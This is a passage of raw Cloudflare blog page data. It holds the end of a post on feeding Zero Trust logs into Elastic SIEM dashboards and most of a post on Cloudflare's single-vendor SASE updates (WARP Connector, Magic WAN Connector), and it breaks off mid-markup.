the integration between Cloudflare and Elastic offer practical and effective data visualization for Zero Trust. They enable us to make data-driven decisions, identify behavioral patterns, and proactively respond to threats. By providing relevant information in a visual and accessible manner, these dashboards strengthen security posture and allow for more efficient risk management in the Zero Trust environment.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-to-get-started\">How to get started</h2>\n <a href=\"#how-to-get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Setup and deployment is simple. Use the Cloudflare dashboard or API to create Logpush jobs with all fields enabled for each dataset you’d like to ingest on Elastic. There are eight account-scoped datasets available to use today (Access Requests, Audit logs, CASB findings, Gateway logs including DNS, Network, HTTP; Zero Trust Session Logs) that can be ingested into Elastic.</p><p>Setup <a href=\"https://developers.cloudflare.com/logs/get-started/enable-destinations/elastic/\">Logpush jobs</a> to your Elastic destination via one of the following methods:</p><ul><li><p><b>HTTP Endpoint mode</b> - Cloudflare pushes logs directly to an HTTP endpoint hosted by your Elastic Agent.</p></li><li><p><b>AWS S3 polling mode</b> - Cloudflare writes data to S3 and Elastic Agent polls the S3 bucket by listing its contents and reading new files.</p></li><li><p><b>AWS S3 SQS mode</b> - Cloudflare writes data to S3, S3 pushes a new object notification to SQS, Elastic Agent receives the notification from SQS, and then reads the S3 object. Multiple Agents can be used in this mode.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h3 id=\"enabling-the-integration-in-elastic\">Enabling the integration in Elastic</h3>\n <a href=\"#enabling-the-integration-in-elastic\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <ol><li><p>In Kibana, go to Management &gt; Integrations</p></li><li><p>In the integrations search bar type Cloudflare Logpush.</p></li><li><p>Click the Cloudflare Logpush integration from the search results.</p></li><li><p>Click the Add Cloudflare Logpush button to add Cloudflare Logpush integration.</p></li><li><p>Enable the Integration with the HTTP Endpoint, AWS S3 input or GCS input.</p></li><li><p>Under the AWS S3 input, there are two types of inputs: using AWS S3 Bucket or using SQS.</p></li><li><p>Configure Cloudflare to send logs to the Elastic Agent.</p></li></ol>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next\">What’s next</h2>\n <a href=\"#whats-next\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>As organizations increasingly adopt a Zero Trust architecture, understanding your organization’s security posture is paramount. The dashboards help with necessary tools to build a robust security strategy, centered around visibility, early detection, and effective threat response. By <a href=\"https://www.cloudflare.com/learning/security/what-is-siem/\">unifying data</a>, normalizing fields, facilitating search, and enabling the creation of custom dashboards, this integration becomes a valuable asset for any cybersecurity team aiming to strengthen their security posture.</p><p>We’re looking forward to continuing to connect Cloudflare customers with our community of technology partners, to help in the adoption of a Zero Trust architecture.</p><p>Explore this new integration today.</p>"],"published_at":[0,"2024-02-22T14:00:26.000+00:00"],"updated_at":[0,"2024-10-09T23:27:02.465Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6tWVYPN3vPmm40W5rh28Jp/be1d313fe7727a6246bc872034817455/enhancing-security-analysis-with-cloudflare-zero-trust-logs-and-elastic-siem.png"],"tags":[1,[[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"4fkY3bvsgn5JfTgXxTZHIR"],"name":[0,"Logs"],"slug":[0,"logs"]}],[0,{"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"name":[0,"Security"],"slug":[0,"security"]}],[0,{"id":[0,"4lvuWnOXVvUOUeWhonoBGO"],"name":[0,"SIEM"],"slug":[0,"siem"]}],[0,{"id":[0,"2mKs6FgD1Rk7bc84C5SXCj"],"name":[0,"Elastic"],"slug":[0,"elastic"]}],[0,{"id":[0,"V86khSc459Yi1AhTlvtY7"],"name":[0,"Partners"],"slug":[0,"partners"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Corey Mahan"],"slug":[0,"corey-mahan"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rO7Nrs04WulaUyysGKjYg/460181b0382fae4856241497c97fbd22/corey-mahan.png"],"location":[0,null],"website":[0,null],"twitter":[0,"@coreymahan"],"facebook":[0,null]}],[0,{"name":[0,"Gavin Chen"],"slug":[0,"gavin"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6nfAuFZQX9r4tGd5uG73zH/77abec6a219f147eb78d69353fb6f019/gavin.png"],"location":[0,"Burlingame, CA"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Andrew Meyer"],"slug":[0,"andrew-meyer"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Jff1jGQVWZWRwM9YtLR5Z/403d9a921ee45af3bbfd7513df03a41d/andrew-meyer.jpg"],"location":[0,"Seattle"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Chema Martínez (Guest Author)"],"slug":[0,"chema"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72ql39impIZNYhUIWdX1FE/56a252baca584358a58a291f73cd57a8/chema.jpeg"],"location":[0,null],"website":[0,"https://www.linkedin.com/in/jmmartinezcanata/"],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Today, we are thrilled to announce new Cloudflare Zero Trust dashboards on Elastic. Shared customers using Elastic can now use these pre-built dashboards to store, search, and analyze their Zero Trust logs. "],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Enhancing security analysis with Cloudflare Zero Trust logs and Elastic SIEM Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/enhancing-security-analysis-with-cloudflare-zero-trust-logs-and-elastic-siem"],"metadata":[0,{"title":[0,"Enhancing security analysis with Cloudflare Zero Trust logs and Elastic SIEM"],"description":[0,"Today, we are thrilled to announce new Cloudflare Zero Trust dashboards on Elastic. Shared customers using Elastic can now use these pre-built dashboards to store, search, and analyze their Zero Trust logs. "],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/60YNeXvned2hWHKKYPapeE/99b7ef04c4d28a66eb3eae9c128151b0/enhancing-security-analysis-with-cloudflare-zero-trust-logs-and-elastic-siem-zj301s.png"]}]}],[0,{"id":[0,"5Emh2Yz5XTRKse4w0c40dp"],"title":[0,"Fulfilling the promise of single-vendor SASE through network modernization"],"slug":[0,"single-vendor-sase-announcement-2024"],"excerpt":[0,"Today, we are announcing a series of updates to our SASE platform, Cloudflare One, that further the promise of a single-vendor SASE architecture"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1mOcjLGteDYQYsMp32AjAy/d7b797f902795cc3fbfe6aa19fb989ee/Single-vendor-SASE-simplified-for-security--networking--and-DevOps-1.png\" alt=\"Fulfilling the promise of single-vendor SASE through network modernization\" class=\"kg-image\" width=\"2400\" height=\"1350\" loading=\"lazy\"/>\n \n </figure><p>As more organizations collectively progress toward adopting a <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\">SASE</a> architecture, it has become clear that the traditional SASE market definition (<a href=\"https://www.cloudflare.com/learning/access-management/security-service-edge-sse/\">SSE</a> + <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-an-sd-wan/\">SD-WAN</a>) is not enough. It forces some teams to work with multiple vendors to address their specific needs, introducing performance and security tradeoffs. More worrisome, it draws focus more to a checklist of services than a vendor’s underlying architecture. Even the most advanced individual security services or traffic on-ramps don’t matter if organizations ultimately send their traffic through a fragmented, flawed network.</p><p>Single-vendor SASE is a critical trend to converge disparate security and networking technologies, yet enterprise &quot;any-to-any connectivity&quot; needs true network modernization for SASE to work for all teams. Over the past <a href=\"/introducing-cloudflare-one\">few years</a>, Cloudflare has launched capabilities to help organizations modernize their networks as they navigate their short- and long-term roadmaps of SASE use cases. We’ve helped simplify SASE implementation, regardless of the team leading the initiative.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"announcing-even-more-flexible-on-ramps-for-single-vendor-sase\">Announcing (even more!) flexible on-ramps for single-vendor SASE</h2>\n <a href=\"#announcing-even-more-flexible-on-ramps-for-single-vendor-sase\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Today, we are announcing a series of updates to our SASE platform, <a href=\"https://www.cloudflare.com/zero-trust/\">Cloudflare One</a>, that further the promise of a single-vendor SASE architecture. Through these new capabilities, Cloudflare makes SASE networking more flexible and accessible for security teams, more efficient for traditional networking teams, and uniquely extend its reach to an underserved technical team in the larger SASE connectivity conversation: DevOps.</p><p>These platform updates include:</p><ul><li><p>Flexible on-ramps for site-to-site connectivity that enable both agent/proxy-based and appliance/routing-based implementations, simplifying SASE networking for both security and networking teams.</p></li><li><p>New WAN-as-a-service (WANaaS) capabilities like high availability, application awareness, a virtual machine deployment option, and enhanced visibility and analytics that boost operational efficiency while reducing network costs through a &quot;light branch, heavy cloud&quot; approach.</p></li><li><p><a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust</a> connectivity for DevOps: mesh and peer-to-peer (P2P) secure networking capabilities that extend <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">ZTNA</a> to support service-to-service workflows and bidirectional traffic.</p></li></ul><p>Cloudflare offers a wide range of SASE on- and off-ramps — including connectors for your WAN, applications, services, systems, devices, or any other internal network resources — to more easily route traffic to and from Cloudflare services. This helps organizations align with their best fit connectivity paradigm, based on existing environment, technical familiarity, and job role.</p><p>We recently dove into the <a href=\"/magic-wan-connector-general-availability/\">Magic WAN Connector</a> in a separate blog post and have explained how all our on-ramps fit together in our <a href=\"https://developers.cloudflare.com/reference-architecture/architectures/sase/\">SASE reference architecture</a>, including our new <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/\">WARP Connector</a>. This blog focuses on the main impact those technologies have for customers approaching SASE networking from different angles.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"more-flexible-and-accessible-for-security-teams\">More flexible and accessible for security teams</h2>\n <a href=\"#more-flexible-and-accessible-for-security-teams\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The process of implementing a SASE architecture can challenge an organization’s status quo for internal responsibilities and collaboration across IT, security, and networking. Different teams own various security or networking technologies whose replacement cycles are not necessarily aligned, which can reduce the organization&#39;s willingness to support particular projects.</p><p>Security or IT practitioners need to be able to protect resources no matter where they reside. Sometimes a small connectivity change would help them more efficiently protect a given resource, but the task is outside their domain of control. Security teams don’t want to feel reliant on their networking teams in order to do their jobs, and yet they also don’t need to cause downstream trouble with existing network infrastructure. They need an easier way to connect subnets, for instance, without feeling held back by bureaucracy.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"agent-proxy-based-site-to-site-connectivity\">Agent/proxy-based site-to-site connectivity</h3>\n <a href=\"#agent-proxy-based-site-to-site-connectivity\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To help push these security-led projects past the challenges associated with traditional siloes, Cloudflare offers both agent/proxy-based and appliance/routing-based implementations for site-to-site or subnet-to-subnet connectivity. This way, networking teams can pursue the traditional networking concepts with which they are familiar through our appliance/routing-based WANaaS — a modern architecture vs. legacy SD-WAN overlays. Simultaneously, security/IT teams can achieve connectivity through agent/proxy-based software connectors (like the <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/\">WARP Connector</a>) that may be more approachable to implement. This agent-based approach blurs the lines between industry norms for branch connectors and app connectors, bringing WAN and ZTNA technology closer together to help achieve least-privileged access everywhere.</p><p>Agent/proxy-based connectivity may be a complementary fit for a subset of an organization&#39;s total network connectivity. These software-driven site-to-site use cases could include microsites with no router or firewall, or perhaps cases in which teams are unable to configure <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-ipsec/\">IPsec</a> or GRE tunnels like in tightly regulated managed networks or cloud environments like Kubernetes. Organizations can mix and match traffic on-ramps to fit their needs; all options can be used composably and concurrently.</p><p>Our agent/proxy-based approach to site-to-site connectivity uses the same underlying technology that helps security teams fully replace VPNs, supporting ZTNA for apps with server-initiated or bidirectional traffic. These include services such as Voice over Internet Protocol (VoIP) and Session Initiation Protocol (SIP) traffic, Microsoft’s System Center Configuration Manager (SCCM), Active Directory (AD) domain replication, and as detailed later in this blog, DevOps workflows.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WoJQPnDHFTkHmaoIOSQny/016a189f6f78e6672768d21a32ed0871/Any-to-Any-Diagram---SVSASE-Blog.png\" alt=\"Diagram showing Cloudflare’s software connectors (on-ramps) simultaneously connecting headquarters, branch offices, data centers, public clouds, and remote users.\" class=\"kg-image\" width=\"1600\" height=\"1217\" loading=\"lazy\"/>\n \n </figure><p>This new Cloudflare on-ramp enables site-to-site, bidirectional, and mesh networking connectivity without requiring changes to underlying network routing infrastructure, acting as a router for the subnet within the private network to on-ramp and off-ramp traffic through Cloudflare.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"more-efficient-for-networking-teams\">More efficient for networking teams</h2>\n <a href=\"#more-efficient-for-networking-teams\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Meanwhile, for networking teams who prefer a network-layer appliance/routing-based implementation for site-to-site connectivity, the industry norms still force too many tradeoffs between <a href=\"https://www.cloudflare.com/network-services/solutions/enterprise-network-security/\">security</a>, performance, cost, and reliability. Many (if not most) large enterprises still rely on legacy forms of private connectivity such as <a href=\"https://www.cloudflare.com/learning/network-layer/what-is-mpls/\">MPLS</a>. MPLS is generally considered expensive and inflexible, but it is highly reliable and has features such as quality of service (QoS) that are used for bandwidth management.</p><p>Commodity Internet connectivity is widely available in most parts of the inhabited world, but has a number of challenges which make it an imperfect replacement to MPLS. In many countries, high speed Internet is fast and cheap, but this is not universally true. Speed and costs depend on the local infrastructure and the market for regional service providers. In general, broadband Internet is also not as reliable as MPLS. Outages and slowdowns are not unusual, with customers having varying degrees of tolerance to the frequency and duration of disrupted service. For businesses, outages and slowdowns are not tolerable. Disruptions to network service means lost business, unhappy customers, lower productivity and frustrated employees. Thus, despite the fact that a significant amount of corporate traffic flows have shifted to the Internet anyway, many organizations face difficulty migrating away from MPLS.</p><p>SD-WAN introduced an alternative to MPLS that is transport neutral and improves networking stability over conventional broadband alone. However, it introduces new topology and security challenges. For example, many SD-WAN implementations can increase risk if they bypass inspection between branches. It also has implementation-specific challenges such as how to address scaling and the use/control (or more precisely, the lack of) a middle mile. Thus, the promise of making a full cutover to Internet connectivity and eliminating MPLS remains unfulfilled for many organizations. These issues are also not very apparent to some customers at the time of purchase and require continuing market education.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"evolution-of-the-enterprise-wan\">Evolution of the enterprise WAN</h3>\n <a href=\"#evolution-of-the-enterprise-wan\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare <a href=\"https://developers.cloudflare.com/magic-wan/\">Magic WAN</a> follows a different paradigm built from the ground up in Cloudflare&#39;s <a href=\"https://www.cloudflare.com/connectivity-cloud/\">connectivity cloud</a>; it takes a &quot;light branch, heavy cloud&quot; approach to augment and eventually replace existing network architectures including MPLS circuits and SD-WAN overlays. While Magic WAN has similar cloud-native routing and configuration controls to what customers would expect from traditional SD-WAN, it is easier to deploy, manage, and consume. It scales with changing business requirements, with security built in. Customers like Solocal agree that the benefits of this architecture ultimately improve their total cost of ownership:</p><blockquote><p><i>&quot;Cloudflare&#39;s Magic WAN Connector offers a centralized and automated management of network and security infrastructure, in an intuitive approach. As part of Cloudflare’s SASE platform, it provides a consistent and homogeneous single-vendor architecture, founded on market standards and best practices. Control over all data flows is ensured, and risks of breaches or security gaps are reduced. It is obvious to Solocal that it should provide us with significant savings, by reducing all costs related to acquiring, installing, maintaining, and upgrading our branch network appliances by up to 40%. A high-potential connectivity solution for our IT to modernize our network.&quot;</i><b><i>– Maxime Lacour, Network Operations Manager, Solocal</i></b></p></blockquote><p>This is quite different from other single-vendor SASE vendor approaches which have been trying to reconcile acquisitions that were designed around fundamentally different design philosophies. These “stitched together” solutions lead to a non-converged experience due to their fragmented architectures, similar to what organizations might see if they were managing multiple separate vendors anyway. Consolidating the components of SASE with a vendor that has built a unified, integrated solution, versus piecing together different solutions for networking and security, significantly simplifies deployment and management by reducing complexity, bypassed security, and potential integration or connectivity challenges.</p><p>Magic WAN can automatically establish IPsec tunnels to Cloudflare via our Connector device, manually via Anycast IPsec or GRE Tunnels initiated on a customer’s edge router or firewall, or via Cloudflare Network Interconnect (CNI) at private peering locations or public cloud instances. It pushes beyond “integration” claims with SSE to truly converge security and networking functionality and help organizations more efficiently modernize their networks.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3loYghphtdKcxfSOh1RssS/c21b0e50fbfdac2bcd7092f47a38f85e/Magic-WAN-Diagram---SVSASE-Blog.png\" alt=\"Diagram showing Cloudflare Magic WAN connecting branch offices, data centers, and VPCs to security services on Cloudflare’s global network.\" class=\"kg-image\" width=\"1600\" height=\"861\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"new-magic-wan-connector-capabilities\">New Magic WAN Connector capabilities</h3>\n <a href=\"#new-magic-wan-connector-capabilities\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In October 2023, we announced the general availability of the Magic WAN Connector, a lightweight device that customers can drop into existing network environments for zero-touch connectivity to Cloudflare One, and ultimately used to replace other networking hardware such as legacy SD-WAN devices, routers, and firewalls. Today, we’re excited to announce new capabilities of the Magic WAN Connector including:</p><ul><li><p><b>High Availability (HA) configurations for critical environments:</b> In enterprise deployments, organizations generally desire support for high availability to mitigate the risk of hardware failure. High availability uses a pair of Magic WAN Connectors (running as a VM or on a supported hardware device) that work in conjunction with one another to seamlessly resume operation if one device fails. Customers can manage HA configuration, like all other aspects of the Magic WAN Connector, from the unified Cloudflare One dashboard.</p></li><li><p><b>Application awareness:</b> One of the central differentiating features of SD-WAN vs. more traditional networking devices has been the ability to create traffic policies based on well-known applications, in addition to network-layer attributes like IP and port ranges. Application-aware policies provide easier management and more granularity over traffic flows. Cloudflare’s implementation of application awareness leverages the intelligence of our global network, using the same categorization/classification already shared across security tools like our Secure Web Gateway, so IT and security teams can expect consistent behavior across routing and inspection decisions - a capability not available in dual-vendor or stitched-together SASE solutions.</p></li><li><p><b>Virtual machine deployment option:</b> The Magic WAN Connector is now available as a virtual appliance software image, that can be downloaded for immediate deployment on any supported virtualization platform / hypervisor. The virtual Magic WAN Connector has the same ultra-low-touch deployment model and centralized fleet management experience as the hardware appliance, and is offered to all Magic WAN customers at no additional cost.</p></li><li><p><b>Enhanced visibility and analytics:</b> The Magic WAN Connector features enhanced visibility into key metrics such as connectivity status, CPU utilization, memory consumption, and device temperature. These analytics are available via dashboard and API so operations teams can integrate the data into their NOCs.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"extending-sases-reach-to-devops\">Extending SASE’s reach to DevOps</h2>\n <a href=\"#extending-sases-reach-to-devops\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 